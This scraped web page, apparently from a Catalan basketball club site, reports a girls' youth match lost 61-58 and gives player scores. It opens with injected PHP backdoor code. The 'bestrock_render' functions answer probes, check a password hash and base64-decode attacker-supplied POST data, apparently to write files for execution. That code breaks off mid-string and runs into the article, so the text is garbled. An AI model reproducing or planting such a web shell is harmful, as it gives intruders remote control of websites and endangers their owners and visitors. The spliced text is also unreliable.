function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infatil Fem 10A cau en un final a cara o creu (61-58) - Tgn Bàsquet Club -

L’Infatil Fem 10A cau en un final a cara o creu (61-58)

Updated: desembre 10, 2023

Partit molt emocionant el que es va disputar entre el CENG Artesa i el TGN. El primer quart va ser molt igualat gràcies a les bones defenses dels dos equips, a la mitja part el TGN disposava d’un punt avantatge (29-30).

En la segona part, els dos equips van seguir oferint un bon partit, amb canvis de marcador constants. Tot i així en els últims minuts el Cardenyes va aconseguir una mínima distància que al final va resultar definitiva. Tot i la derrota, molt bon partit del TGN que encadena diversos partits amb un molt bon nivell competitiu.

CENG J. CARDENYES: 61 – TGN BÀSQUET 10A58

PARCIALS: 14-13, 15-17, 14-17, 18-11

CENG J. CARDENYES: Aubets (-), Galceran (9), Camarasa (2), Costafreda (2) i Camats (2)—cinc inicial— Bernaus (2), Farre (4), Gabarro (21), Galceran (2), Ros (17) i Vellvé (-).
LES XIFRES DEL PARTIT: 8/27 tirs lliures | 18 faltes

TGN BÀSQUET 10A: Valls (10), Porta (7), Martín (6), García (6) i Sentis (13)—cinc inicial— Ramón (7), Sanchez (2), Bueso (4) i Parera (5).

LES XIFRES DEL PARTIT: 8/16 tirs lliures | 23 faltes